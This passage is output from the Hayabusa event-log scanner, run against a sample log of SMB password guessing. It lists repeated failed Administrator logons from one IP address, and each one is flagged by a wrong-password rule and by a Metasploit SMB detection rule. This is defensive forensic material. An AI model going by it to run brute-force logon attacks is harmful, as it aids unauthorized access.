NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
